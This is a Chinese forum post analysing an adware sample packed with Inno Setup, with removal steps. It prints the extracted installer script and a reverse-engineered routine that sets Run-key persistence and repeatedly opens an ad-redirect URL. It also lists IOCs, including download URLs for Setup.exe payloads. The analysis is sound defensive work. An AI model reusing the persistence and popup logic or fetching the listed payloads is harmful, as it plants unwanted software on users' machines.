-
-
[原创] Kamnira Adware分析
-
2020-12-28 22:48 3567
-
Kamnira Adware分析
前言
前几天,虚拟机中的Chrome浏览器老是不停的弹一些广告页面。检查一下任务管理器,才明白是中了Adware类型的恶意程序了。
今天给大家分析一下这个样本,最后再给出如何人工删除这样的恶意样本。
1 2 3 4 | FileDescription: FJaj Setup ProductName: FJaj MD5: 45965353941D1512AE04F9AD1C45E125 Sha - 1 : 2743E94CDD4786E41960F9C28B2C8B881C9CEE8A |
初步分析
1. IDA 静态分析
从start->main函数,发现
InnoSetUpLdrWindow
字符串,Shift+F12
打开字符串列表,出现如下字符串:
1 2 | Inno Setup Setup Data ( 5.5 . 7 ) Inno Setup Messages ( 5.5 . 3 ) |
由上面字符串推测,应该是由某个软件打包或者二次开发的。
2. 查找Inno Setup字符串
Inno Setup
字符串,跳到Inno SetUp
软件官网https://jrsoftware.org/isinfo.php
,它是一个免费Windows安装程序打包软件。
3. 提出Kamnira恶意代码Payload
使用
Inno Extractor
软件提取Kamnira Payload
psvince.dll、idp.dll和itdownload.dll
被Inno Setup Pascal
脚本调用,相关源码链接在文章结尾给出。decompressor.dll和 How-To-PROPERLY
是与网络编码与解码相关的库。
install_script 安装脚本分析
1. Inno Setup Version
1 | ;InnoSetupVersion = 5.5 . 7 |
2. SetUp Section
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | [Setup] AppName = FJaj AppId = FHann AppVersion = 64.41 AppPublisherURL = ssh: / / 42.21 . 62.5 AppSupportURL = ssh: / / 42.21 . 62.5 AppUpdatesURL = ssh: / / 42.21 . 62.5 DefaultDirName = {pf}\FJaj DefaultGroupName = FJaj OutputBaseFilename = E0UGA4~ 1.EXE Compression = zip - - > 压缩算法 PrivilegesRequired = lowest DisableDirPage = auto DisableProgramGroupPage = auto WizardImageFile = embedded\WizardImage0.bmp WizardSmallImageFile = embedded\WizardSmallImage0.bmp |
3. Files Section
1 2 3 4 5 | [Files] Source: "{tmp}\HOW-TO-PROPERLY-HTP--master.zip" ; DestDir: "{tmp}" ; MinVersion: 0.0 , 5.0 ; Flags: deleteafterinstall dontcopy Source: "{tmp}\psvince.dll" ; DestDir: "{tmp}" ; MinVersion: 0.0 , 5.0 ; Flags: deleteafterinstall dontcopy Source: "{tmp}\idp.dll" ; DestDir: "{tmp}" ; MinVersion: 0.0 , 5.0 ; Flags: deleteafterinstall dontcopy Source: "{tmp}\itdownload.dll" ; DestDir: "{tmp}" ; MinVersion: 0.0 , 5.0 ; Flags: deleteafterinstall dontcopy |
4. CustomMessage Section
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | [CustomMessages] default.NameAndVersion = % 1 version % 2 default.AdditionalIcons = Additional shortcuts: default.CreateDesktopIcon = Create a &desktop shortcut default.CreateQuickLaunchIcon = Create a &Quick Launch shortcut default.ProgramOnTheWeb = % 1 on the Web default.UninstallProgram = Uninstall % 1 default.LaunchProgram = Launch % 1 default.AssocFileExtension = &Associate % 1 with the % 2 file extension default.AssocingFileExtension = Associating % 1 with the % 2 file extension... default.AutoStartProgramGroupDescription = Startup: default.AutoStartProgram = Automatically start % 1 default.AddonHostProgramNotFound = % 1 could not be located in the folder you selected. % n % nDo you want to continue anyway? / * 以上是默认配置 * / IDP_FormCaption = Downloading additional files IDP_FormDescription = Please wait while Setup is downloading additional files... IDP_TotalProgress = Total progress IDP_CurrentFile = Current file IDP_File = File : IDP_Speed = Speed: IDP_Status = Status: IDP_ElapsedTime = Elapsed time: IDP_RemainingTime = Remaining time: IDP_DetailsButton = Details IDP_HideButton = Hide IDP_RetryButton = Retry IDP_IgnoreButton = Ignore IDP_KBs = KB / s IDP_MBs = MB / s IDP_X_of_X = % . 2f of % . 2f IDP_KB = KB IDP_MB = MB IDP_GB = GB IDP_Initializing = Initializing... IDP_GettingFileInformation = Getting file information... IDP_StartingDownload = Starting download... IDP_Connecting = Connecting... IDP_Downloading = Downloading... IDP_DownloadComplete = Download complete IDP_DownloadFailed = Download failed IDP_CannotConnect = Cannot connect IDP_CancellingDownload = Cancelling download... IDP_Unknown = Unknown IDP_DownloadCancelled = Download cancelled IDP_RetryNext = Check your connection and click 'Retry' to try downloading the files again, or click 'Next' to continue installing anyway. IDP_RetryCancel = Check your connection and click 'Retry' to try downloading the files again, or click 'Cancel' to terminate setup. IDP_FilesNotDownloaded = The following files were not downloaded: IDP_HTTPError_X = HTTP error % d IDP_400 = Bad request ( 400 ) IDP_401 = Access denied ( 401 ) IDP_404 = File not found ( 404 ) IDP_407 = Proxy authentication required ( 407 ) IDP_500 = Server internal error ( 500 ) IDP_502 = Bad gateway ( 502 ) IDP_503 = Service temporaily unavailable ( 503 ) |
经过验证上述关于
IDP
的配置与开源项目innosetup-download-plugin
完全一致. 这部分配置说明,该样本只使用了idp.dll
的函数,并没有使用itdownload.dll
中的函数.
5. Code Section
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 | { * 初始化函数: 该函数在安装程序初始化时调用,返回 False 将中断安装, True 则继续安装 * } INITIALIZESETUP { 与安装向导相关的函数 } WIZARDVERYSILENT WIZARDSUPRESSMSGBOXES { 函数或过程, 这些函数名称与其功能相同,相关源码链接在文章结尾给出 } procedure idpAddFile(Arg0: ?; Arg1: ?) cdecl; external 'idpAddFile@idp.dll cdecl' ; procedure idpAddFileComp(Arg0: ?; Arg1: ?; Arg2: ?) cdecl; external 'idpAddFileComp@idp.dll cdecl' ; procedure idpAddMirror(Arg0: ?; Arg1: ?) cdecl; external 'idpAddMirror@idp.dll cdecl' ; procedure idpAddFtpDir(Arg0: ?; Arg1: ?; Arg2: ?; Arg3: ?) cdecl; external 'idpAddFtpDir@idp.dll cdecl' ; procedure idpAddFtpDirComp(Arg0: ?; Arg1: ?; Arg2: ?; Arg3: ?; Arg4: ?) cdecl; external 'idpAddFtpDirComp@idp.dll cdecl' ; procedure idpClearFiles() cdecl;external 'idpClearFiles@idp.dll cdecl' ; function idpFilesCount(): ? cdecl;external 'idpFilesCount@idp.dll cdecl' ; function idpFtpDirsCount(): ? cdecl;external 'idpFtpDirsCount@idp.dll cdecl' ; function idpFileDownloaded(Arg0: ?): ? cdecl;external 'idpFileDownloaded@idp.dll cdecl' ; function idpFilesDownloaded(): ? cdecl;external 'idpFilesDownloaded@idp.dll cdecl' ; function idpDownloadFile(Arg0: ?; Arg1: ?): ? cdecl; external 'idpDownloadFile@idp.dll cdecl' ; function idpDownloadFiles(): ? cdecl;external 'idpDownloadFiles@idp.dll cdecl' ; function idpDownloadFilesComp(): ? cdecl;external 'idpDownloadFilesComp@idp.dll cdecl' ; function idpDownloadFilesCompUi(): ? cdecl; external 'idpDownloadFilesCompUi@idp.dll cdecl' ; procedure idpStartDownload() cdecl; external 'idpStartDownload@idp.dll cdecl' ; procedure idpStopDownload() cdecl; external 'idpStopDownload@idp.dll cdecl' ; procedure idpSetLogin(Arg0: ?; Arg1: ?) cdecl; external 'idpSetLogin@idp.dll cdecl' ; procedure idpSetProxyMode(Arg0: ?) cdecl; external 'idpSetProxyMode@idp.dll cdecl' ; procedure idpSetProxyName(Arg0: ?) cdecl; external 'idpSetProxyName@idp.dll cdecl' ; procedure idpSetProxyLogin(Arg0: ?; Arg1: ?) cdecl; external 'idpSetProxyLogin@idp.dll cdecl' ; procedure idpConnectControl(Arg0: ?; Arg1: ?) cdecl; external 'idpConnectControl@idp.dll cdecl' ; procedure idpAddMessage(Arg0: ?; Arg1: ?) cdecl; external 'idpAddMessage@idp.dll cdecl' ; procedure idpSetInternalOption(Arg0: ?; Arg1: ?) cdecl; external 'idpSetInternalOption@idp.dll cdecl' ; procedure idpSetDetailedMode(Arg0: ?) cdecl; external 'idpSetDetailedMode@idp.dll cdecl' ; procedure idpSetComponents(Arg0: ?) cdecl; external 'idpSetComponents@idp.dll cdecl' ; procedure idpReportError() cdecl; external 'idpReportError@idp.dll cdecl' ; procedure idpTrace(Arg0: ?) cdecl; external 'idpTrace@idp.dll cdecl' ; procedure idpAddFileSize32(Arg0: ?; Arg1: ?; Arg2: ?) cdecl; external 'idpAddFileSize32@idp.dll cdecl' ; procedure idpAddFileSize32(Arg0: ?; Arg1: ?; Arg2: ?; Arg3: ?) cdecl; external 'idpAddFileSize32@idp.dll cdecl' ; function idpGetFileSize32(Arg0: ?; var Arg1: ?): ? cdecl; external 'idpGetFileSize32@idp.dll cdecl' ; function idpGetFilesSize32(var Arg0: ?): ? cdecl; external 'idpGetFilesSize32@idp.dll cdecl' ; procedure itd_cancel() stdcall; external 'itd_cancel@itdownload.dll stdcall' ; procedure itd_clearfiles() stdcall; external 'itd_clearfiles@itdownload.dll stdcall' ; function itd_downloadfile(Arg0: ?; Arg1: ?): ? stdcall; external 'itd_downloadfile@itdownload.dll stdcall' ; function itd_getresultlen(): ? stdcall; external 'itd_getresultlen@itdownload.dll stdcall' ; procedure itd_getresultstring(Arg0: ?; Arg1: ?) stdcall; external 'itd_getresultstring@itdownload.dll stdcall' ; procedure itd_initui(Arg0: ?) stdcall; external 'itd_initui@itdownload.dll stdcall' ; function itd_loadstrings(Arg0: ?): ? stdcall; external 'itd_loadstrings@itdownload.dll stdcall' ; procedure itd_setoption(Arg0: ?; Arg1: ?) stdcall; external 'itd_setoption@itdownload.dll stdcall' ; function itd_getfilesize(Arg0: ?; var Arg1: ?): ? stdcall; external 'itd_getfilesize@itdownload.dll stdcall' ; function itd_getstring(Arg0: ?): ? stdcall; external 'itd_getstring@itdownload.dll stdcall' ; function itd_getoption(Arg0: ?; Arg1: ?; Arg2: ?): ? stdcall; external 'itd_getoption@itdownload.dll stdcall' ; procedure itd_setstring(Arg0: ?; Arg1: ?) stdcall; external 'itd_setstring@itdownload.dll stdcall' ; procedure itd_addfile(Arg0: ?; Arg1: ?) stdcall; external 'itd_addfile@itdownload.dll stdcall' ; procedure itd_addmirror(Arg0: ?; Arg1: ?) stdcall; external 'itd_addmirror@itdownload.dll stdcall' ; procedure itd_addfilesize(Arg0: ?; Arg1: ?; Arg2: ?) stdcall; external 'itd_addfilesize@itdownload.dll stdcall' ; function itd_downloadfiles(Arg0: ?): ? stdcall; external 'itd_downloadfiles@itdownload.dll stdcall' ; function itd_filecount(): ? stdcall; external 'itd_filecount@itdownload.dll stdcall' ; function itd_postpage(Arg0: ?; Arg1: ?; Arg2: ?): ? stdcall; external 'itd_postpage@itdownload.dll stdcall' ; function IsModuleLoaded(Arg0: ?): ? stdcall; external 'IsModuleLoaded@psvince.dll stdcall' ; function ShellExecuteA(Arg0: ?; Arg1: ?; Arg2: ?; Arg3: ?; Arg4: ?; Arg5: ?): ? stdcall;external 'ShellExecuteA@shell32.dll stdcall' ; procedure ExitProcess(Arg0: ?) stdcall; external 'ExitProcess@kernel32.dll stdcall' ; |
6. 逆向还原INITIALIZESETUP函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 | function INITIALIZESETUP():BOOLEAN const { * constant string value * } { * URL * } param = '{param:p|}' ; open_action = 'open' ; https = 'https://' ; url_header = 'thebestof' ; url_end = 'fersintheweb.com/redirect/57a764d042bf8/' ; { * registry * } full_path = "{srcexe}" ; HKEY_CURRENT_USER = 0x80000001 ; subkey = 'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' ; { * other * } taskmgr = 'taskmgr.exe' ; { * constant number value * } sleep_ms = 60000 ; var error_code, flag, seven, random_value, sum_times, url begin param_value : = EXPANDCONSTANT(param); flag : = param_value <> ''; {不为空,则设置自启动} if not flag then src_exe_full_path : = EXPANDCONSTANT(full_path) s : = '"' + src_exe_full_path + '" /VERYSILENT' random_value : = RANDOM( 9999999 ) REGWRITESTRINGVALUE(HKEY_CURRENT_USER, subkey, INTTOSTR(random_value), s) {设置自启动} while 1 do begin random_value = RANDOM( 5 ) if random_value > 1 then sum_times : = random_value * 60000 SLEEP(sum_times) break ; end; label1: result : = IsModuleLoaded(taskmgr) {taskmgr.exe进程是否存在,存在(TRUE), 不存在(FALSE)} if result then url : = https + url_header + url_end SHELLEXEC( open , url,' ', ' ', 5 , 0 , error_code) while 1 do begin random_value : = RANDOM( 7 ); result : = random_value > 1 ; if result then sum_times : = random_value * 60000 SLEEP(sum_times); {休眠} goto label1; else sum_times : = random_value * sleep_ms; SLEEP(sum_times); result : = IsModuleLoaded(taskmgr); if result then url : = https + url_header + url_end; SHELLEXEC( open , url,' ', ' ', 5 , 0 , error_code); {打开url} end; end. |
INITIALIZESETUP
函数主要完成两个任务:1.修改注册表,以实现持久化;2. 不间断打开浏览器推送广告。
不过,代码中有一点很有意思:用户打开进程管理器,该样本仍弹广告而不是休眠。(有可能是我分析错了,大牛可以在评论里面指正)
追踪URL
浏览器配置代理为
127.0.0.1:8080
, 使用burpsuite拦截浏览器请求.
1.经过一次重定向跳转至广告页面
2.经过五次重定向跳转至广告页面
3.经过七次重定向跳转至广告页面
总结:每次浏览器重新请求
www.thebestoffersintheweb.com
页面,跳转至最终广告页面的次数不是确定的。
总结
整个恶意程序大部分都是使用开源代码开发,需要修改的部分只有一个
Inno Setup
安装脚本和一个推送广告的网站。这个样本只是虚拟机感染Adware样本之一,其他的样本分析手法类似。第一次分析Innosetup
类型的样本,顺便花一上午学习pascal
脚本。我本身主要做逆向分析的,欢迎其他大牛补充恶意广告域名部分内容。使用微步查询onclickmax.com
,得到如下结果:
如何删除该样本
1. kill process
打开进程管理器,结束进程。一般该进程处于未响应状态。
2. 删除相关文件
删除当前恶意样本,然后打开
%tmp%
文件夹,删除相关文件。
3. 注册表相关
检查
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
是否有存在与该样本相关的自动项。
相关链接
1 2 3 4 5 | idp源码:https: / / github.com / WPN - XM / WPN - XM / tree / master / bin / innosetup - download - plugin itdownload源码:https: / / github.com / wilbit / itdownload.git psvince源码: https: / / github.com / XhmikosR / psvince Pascal脚本学习:https: / / iowiki.com / pascal / Innosetup Pascal脚本: https: / / blog.csdn.net / yushanddddfenghailin / article / details / 17250917 |
IOC
1 2 3 4 5 6 | website: http: / / www.onclickmax.com / URL: ssh: / / 42.21 . 62.5 URL: http: / / e44e2824 - 6dea - 452b - bca8 - b2c5db1680a9.s3.amazonaws.com / Bubble / Fake / Setup.exe URL: http: / / e44e2824 - 6dea - 452b - bca8 - b2c5db1680a9.s3.amazonaws.com / Bubble / USA / Setup.exe URL: http: / / e44e2824 - 6dea - 452b - bca8 - b2c5db1680a9.s3.amazonaws.com / Bubble / CA / Setup.exe URL: http: / / e44e2824 - 6dea - 452b - bca8 - b2c5db1680a9.s3.amazonaws.com / Bubble / SE / Setup.exe |
[培训]二进制漏洞攻防(第3期);满10人开班;模糊测试与工具使用二次开发;网络协议漏洞挖掘;Linux内核漏洞挖掘与利用;AOSP漏洞挖掘与利用;代码审计。